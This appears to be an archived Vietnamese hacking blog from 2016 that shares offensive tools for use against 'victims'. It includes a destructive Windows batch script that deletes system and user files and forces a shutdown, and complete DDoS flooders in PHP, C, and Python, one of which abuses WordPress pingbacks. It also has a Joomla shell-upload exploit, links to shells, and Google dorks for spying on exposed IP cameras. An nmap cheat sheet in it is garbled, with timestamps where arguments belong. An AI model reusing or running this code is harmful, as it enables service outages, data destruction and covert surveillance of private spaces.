Monday, March 7, 2016

Keepdead mod

Share keepdead đã mod max mạnh :3

Link:http://pastebin.com/vewHfjLL

PHP nhé ai có shell hoặc host thì test liền :3

Sunday, March 6, 2016

Virus phá win

@Echo Off
@cls
@title welcome to nhoit
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit

MadspotV2 shell

MadspotV2 Shell
Link:http://pastebin.com/SR9ctfyR

User:GTP
Pass:GTP

Con shell super chức nawg :V

ddos (php)

<?php
$dominio = $_POST['host'];
$ruta = $_POST['path'];
$port = $_POST['port'];
$poder = $_POST['poder'];
$pw = $_POST['pw'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
<meta name="author" content="Punker2Bot" />
<title>DDOS Attack by HVN™</title>
<style>
body { padding: 3px; }
* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }
input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }
input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }
input:hover , input:active { border-color: #FFE900 }
#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
<script type="text/javascript">
function ir_a_bajo(){
var scc = document.getElementById('dinamico');
scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
}
setInterval('ir_a_bajo()',75);
</script>
</head>
<body id="index">
<form action="" method="post" name="jaja">
<table>
<tr>
<td class="titulo">
Domain</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Cổng </td>
<td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Mật khẩu </td>
<td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
</tr>
<tr>
<td>Bạn đã sẵn sàng chưa?</td>
<td><input type="submit" value="DDOS ngay bây giờ!" class="accion"></td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
$msj = array("<h2>Bạn không thể tiếp tục vì nhập sai mật khẩu</h2></div></body></html>","<h2>Hãy điền đúng thông tin về victim trước đã!</h2></div></body></html>","<big><b>Không thể tấn công!!!</b></big><br />n","0a32e26a417d2c7cfbd33","2e2234a41122a233cfbd333b9bc30a03");
function ddoser($dominio,$ruta) {
//hago un random de ips para no ser siempre el mismo vistitante
$ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
//defino y abro socket segun los datos del form
$socket = fsockopen($dominio, "80", $errno, $errstr, 30);
// comienzan los datos del header para parecer una persona comun xD
$header = "GET ".$ruta." HTTP/1.1rn";
$header .= "Host: ".$dominio."rn";
$header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16rn";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5rn";
$header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3rn";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn";
$header .= "Keep-Alive: 300rn";
$header .= "*****-Connection: keep-alivern";
$header .= "Referer: http://".$dominio.$ruta."rn";
$header .= "Content-Type: application/x-www-form-urlencodedrn";
$header .= "X-Forwarded-For: ".$ip_simulada."rn";
$header .= "Via: CB-Prxrn";
$header .= "Connection: Closernrn";
//envio todo lo recolectado
$send_header = fwrite($socket,$header);
//lo muestro en la web
if($send_header) {
print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />n");
} else {
print("$msj[2]");
}fclose($socket);
}
if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
if($dominio !== "" && $dominio !== "www.victima.com") {
while(1) {
ddoser($dominio,$ruta);
}
} else { die ("$msj[1]");}
?>
</div>
</body>
</html>

Xerxe.c

/* XerXes - DDos by ./ChmoD Folow Me @ChmoD_Haxor  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}

Nmap Tool All Commands Collection

Nmap Tool All Commands Collection (các lệnh Nmap)
Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl Thursday, October 08, 2015 16:14 UTC+9 [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout Thursday, October 08, 2015 16:14 UTC+9 [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout Thursday, October 08, 2015 16:14 UTC+9 [target]

Minimum Scan delay —-> nmap –scan-delay Thursday, October 08, 2015 16:14 UTC+9 [target]

Maximum scan delay —-> nmap –max-scan-delay Thursday, October 08, 2015 16:14 UTC+9 [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every Thursday, October 08, 2015 16:14 UTC+9 [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

Best lulz ddos (PY)

# Embedded file name: test.py
import urllib, os, threading, time, sys
print '\n                     ###################################\n'
print '                 80800808.....::DDoS LUlZC::.....808088080\n'
print '              ************************************************'
print
print '                          \t lulzc.blogspot.com \n'
if os.name in ('nt', 'dos', 'ce'):
    os.system('title       ........::::: DDoS LUlZC :::::........')
    os.system('color e')
Close = False
Lock = threading.Lock()
Request = 0
Tot_req = 0

class Spammer(threading.Thread):

    def __init__(self, url, number):
        threading.Thread.__init__(self)
        self.url = url
        self.num = number

    def run(self):
        global Lock
        global Tot_req
        global Close
        global Request
        Lock.acquire()
        print 'Starting thread #{0}'.format(self.num)
        Lock.release()
        while Close == False:
            try:
                urllib.urlopen(self.url)
                Request += 1
                Tot_req += 1
            except:
                pass

        Lock.acquire()
        print 'Closing thread #{0}'.format(self.num)
        Lock.release()
        sys.exit(0)


if __name__ == '__main__':
    try:
        num_threads = input('> Power(1000): ')
        t_tot = input('> Time(2): ')
    except:
        t_tot = 2

    timer = t_tot * 60
    t_tot = t_tot * 60
    while True:
        url = raw_input('> Victim: ')
        try:
            urllib.urlopen(url)
        except IOError:
            print 'Could not open specified url.'
        else:
            break

    for i in xrange(num_threads):
        Spammer(url, i + 1).start()

    time.sleep(2)
    print '#######################################################################'
    print '\n> Bot Are Loaded Sucessfully.'
    print '\n> LUlZC is working hard. . .\n'
    while timer > 0:
        time.sleep(10)
        print '> LUlZC @ ' + str(Request / 10.0) + ' Requests/s\tTotal Request: #' + str(Tot_req) + '\tTime left:', timer, 's'
        Request = 0
        timer -= 10

    print '\n> Average  @ ' + str(Tot_req / t_tot) + ' Requests/s'
    print '\n#######################################################################\n'
    raw_input('> LUlZC is still working, now you can press enter to shutting down threads.')
    time.sleep(1)
    Close = True

EBOLA HTTP DDos (pY)

Code EBOLA HTTP

# Embedded file name: EbolaHTTP.py
import random
import socket
import threading
import time
print ''
print '                ###############################################'
print '                #              EBOLA HTTP  v. 1.5             #'
print '                ###############################################'
print '                #              PRIMA FAI IL LOGIN             #'
print '                ###############################################'
print ''
print ''

class Secure:
    logbase = {'ebola': 'ebola'}
    logged = False
    invalid = False

    def login(self, user, passw):
        self.logged = False
        self.invalid = False
        try:
            if self.logbase[user] == passw:
                self.logged = True
            else:
                self.logged = False
        except:
            self.logged = False
            self.invalid = True

    def __init__(self):
        while self.logged == False:
            user = raw_input('Username: ')
            passw = raw_input('Password: ')
            self.login(user, passw)
            if self.invalid == True:
                print 'Nome Errato'
            elif self.logged == False:
                print 'Nome O Password Errati'
            elif self.logged == True:
                print 'Benvenuto, %s' % user


S = Secure()
userAgents = ['Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101  Firefox/28.0',
 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
 'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
 'Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00',
 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
 'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14',
 'Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02',
 'Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00',
 'Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00',
 'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)',
 'HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)',
 'Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)',
 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+',
 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27']

def randomIp():
    random.seed()
    result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
    result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
    return result


def randomIpList():
    random.seed()
    res = ''
    for ip in xrange(random.randint(2, 8)):
        res = res + randomIp() + ', '

    return res[0:len(res) - 2]


def randomUserAgent():
    return random.choice(userAgents)


class attacco(threading.Thread):

    def run(self):
        current = x
        if current < len(listaproxy):
            proxy = listaproxy[current].split(':')
        else:
            proxy = random.choice(listaproxy).split(':')
        useragent = 'User-Agent: ' + randomUserAgent() + '\r\n'
        forward = 'X-Forwarded-For: ' + randomIpList() + '\r\n'
        httprequest = get_host + useragent + accept + forward + connection + '\r\n'
        while nload:
            time.sleep(1)

        while 1:
            try:
                a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                a.connect((proxy[0], int(proxy[1])))
                a.send(httprequest)
                try:
                    for i in xrange(3):
                        a.send(httprequest)

                except:
                    tts = 1

            except:
                proxy = random.choice(listaproxy).split(':')


print ''
print ''
print '                ###############################################'
print '                #                MADE BY GUZMAN96             #'
print '                #                EBOLA HTTP  v. 1.5           #'
print '                ###############################################'
print '                #           USARE SU UN VPS / DEDICATO        #'
print '                ###############################################'
print '                #               SKYPE: OOATOMICZOO            #'
print '                ###############################################'
print '                #            TS3: TS3.DRCCOMMUNITY.NET        #'
print '                ###############################################'
print '                #          FORUM: FORUM.DRCCOMMUNITY.NET      #'
print '                ###############################################'
print ''
print ''
url = raw_input('Sito (Es http://sito.com/) : ')
host_url = url.replace('http://', '').replace('https://', '').split('/')[0]
in_file = open(raw_input('Lista proxy (Es: proxy.txt) : '), 'r')
proxyf = in_file.read()
in_file.close()
listaproxy = proxyf.split('\n')
thread = input('Pacchetti (Consigliati: 800): ')
get_host = 'GET ' + url + ' HTTP/1.1\r\nHost: ' + host_url + '\r\n'
accept = 'Accept-Encoding: gzip, deflate\r\n'
connection = 'Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n'
nload = 1
x = 0
for x in xrange(thread):
    attacco().start()
    time.sleep(0.003)
    print '' + str(x) + ' Pacchetti Partiti!'

print 'Attacco Iniziato...'
nload = 0
while not nload:
    time.sleep(1)

Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

  1. $************************************************* *******************************$
  2. # +================================================= ================+
  3. # | Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability |
  4. # +================================================= ================+
  5. # Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
  6. # Date : 14/09/2012
  7. # Exploit Author : D35m0nd142
  8. # Vendor Homepage : http://fabrikar.com/
  9. # Tested on : Mozilla Firefox on Ubuntu 12.04
  10. $************************************************* *******************************$
  11. # Vulnerable path :
  12. index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
  13. --
  14. In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".
  15. --
  16. Screenshot of the uploading page --> http://imageshack.us/photo/my-images/269/comfabrik.png/
  17. --
  18. After uploaded shell go to --> http://[target]/media/yourshell.php
Source DDoS tools duykhang (autoIT)

Link:http://pastebin.com/E7zy3dJj

Thả vào autoIT là xong :3 
Enjoy
Share tools get file index. (Các bạn dùng autoIT nhé )

Code cổ điển ^^ : http://pastebin.com/r4qhXhWQ

Source ddos attack |python|

                          Source ddos attack  |python|

# Embedded file name: ddos.py
import sys
import socket
import threading
import time
import os
Lock = threading.Lock()

def main():
    try:
        in_file = open('list.txt', 'r')
    except:
        raw_input('You need a list.txt file to work')
        sys.exit(0)

    os.system('title ...:: DDoS ATTACK BY AO ::... ')
    print '\t*********************************************??**********************'
    print '\t***6996****9669*****00000000***333333********?*****00000000**********'
    print '\t***69*96***96*69****00****00***00***********00*****00****00**********'
    print '\t***69**96**96**69***00****00****00********00*00****00****00**********'
    print '\t***69***96*96***69**00****00*****00******0000000***00****00**********'
    print '\t***69**96**96**69***00****00******00****00*****00**00****00**********'
    print '\t***69*96***96*69****00****00*******00**00*******00*00****00**********'
    print '\t***6996****9669*****00000000***333333**************00000000**********'
    print '\t*********************************************************************'
    num_thread = input('Number Of Bot: ')
    url = raw_input('Target: ')
    for i in range(num_thread):
        try:
            in_line = in_file.readline()
            Thread1(url, i + 1, in_line).start()
            in_line = in_line[:-1]
        except:
            pass

    time.sleep(3)


class Thread1(threading.Thread):

    def __init__(self, url, number, blog):
        self.url = url
        self.number = number
        self.blog = blog
        threading.Thread.__init__(self)

    def run(self):
        Lock.acquire()
        print 'Starting thread #%s' % self.number
        Lock.release()
        function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>" % (self.url, self.blog)
        request_lenght = len(function_pingback)
        try:
            self.blog_cleaned = self.blog.split('?p=')[0]
            self.blog_cleaned1 = self.blog_cleaned.split('http://')[1].split('/')[0]
        except:
            sys.exit(0)

        request = 'POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n' % (self.blog_cleaned,
         self.blog_cleaned1,
         request_lenght,
         self.url,
         self.blog)
        while True:
            time.sleep(3)
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
                s.connect((self.blog_cleaned1, 80))
                s.send(request)
                print 'Bot %s | Victim %s' % (self.number, self.blog_cleaned1)
            except:
                ok = 0


main()



E

Dork camera free

có camera phòng tắm á  !


inurl:/view.shtml
intitle
:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
intitle:start inurl:cgistart
intitle:”live view” intitle:axis
liveapplet
intitle:snc-z20 inurl:home/
intitle:liveapplet
intitle:”i-Catcher Console - Web Monitor”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
intitle:”Live View / - AXIS 206M”
inurl:”MultiCameraFrame?Mode=Motion”
allintitle:”
Network Camera
NetworkCamera”
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:”netcam live image”
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera”

Dictionary attack

     
Bài viết này sẽ nói về một tham vọng nho nhỏ là tổ hợp bộ từ điển password tiếng Việt. Cũng như nói sơ qua về Password Dictionary Attack với Password Brute Force Attack 

Dictionary Attack và Brute Force attack 

Đầu tiên cần có chút phân biệt nho nhỏ giữa 2 kiểu tấn công nhắm vào mật khẩu này. Nhưng trước nhất chúng ta nên nói sơ qua về password ( tôi không dùng từ Mật Khẩu vì từ này sai tét bét ). 

Password mà tôi nói tới ở đây thường là một chuỗi tổ hợp ký tự có độ dài giới hạn bao gồm tất cả các ký tự mà bảng mã ký tự lớn nhất hành tinh hiện nay có thể đánh mã số - bảng mã Unicode. Sức mạnh của password nằm ở 2 điểm 

-    Chỉ một hoặc một số ít người biết nội dung ( tổ hợp ký tự được dùng ) làm password. Điều này đem tới thứ lợi ích đầu tiên là “bí mật” 
-    Nếu một người không biết nội dung của password thì buộc phải dí dao vào cổ thằng có password để đòi hoặc buộc sẽ phải đoán. Tức là phải tốn công sức ở một mức độ nào đó để lấy được Password. Điều này đem đến lợi ích thứ 2 “bảo mật” 

Theo như điểm thứ 2 ở trên thì chúng ta hình thành được 2 con đường để phá vỡ lợi ích “bảo mật” ( bảo vệ bí mật ) của password 

-    Dí dao lấy password từ thằng có password. Dĩ nhiên là tôi nói đùa đấy, đây là cách nói cụ thể cho hướng lấy password từ chính người có nó, thông qua tấn công APT, nghe lén, keylogging… Tuy nhiên nếu như người có password là người không dễ để có thể lấy được password, ví dụ: không thể dí dao vào cổ Tổng Thống Mỹ để lấy password ( bạn sẽ bị phơ ngay 1 viên kẹo ), hoặc attack vào máy tính của một chuyên gia bảo mật am tường ( kiểu như lão mrro, gamma95 ) bạn sẽ bị phản “damage” nếu thử attack họ ( ví dụ stl chơi dại khi đụng vào anh TQN )

-    Đoán mò password. Đúng bạn phải “đoán” và “mò” password 
Tôi sẽ nói rõ hơn về vụ “đoán” và “mò” password này. Đây là 2 động từ tiếng Việt của 2 phương pháp kỹ thuật tấn công password dưới đây 
-    Đoán: Dictionary Attack 
-    Mò: Brute Force Attack 

Brute Force Attack: 


Tôi sẽ nói về cái này trước. Đây là kiểu tấn công mà bạn sẽ “mò” tất cả các tổ hợp ký tự có thể là password cho đến khi có một tổ hợp ký tự trùng khớp với tổ hợp ký tự được dùng làm password. Phương pháp tấn công này giúp ta thấy rõ được điểm mạnh cốt lõi của password. 

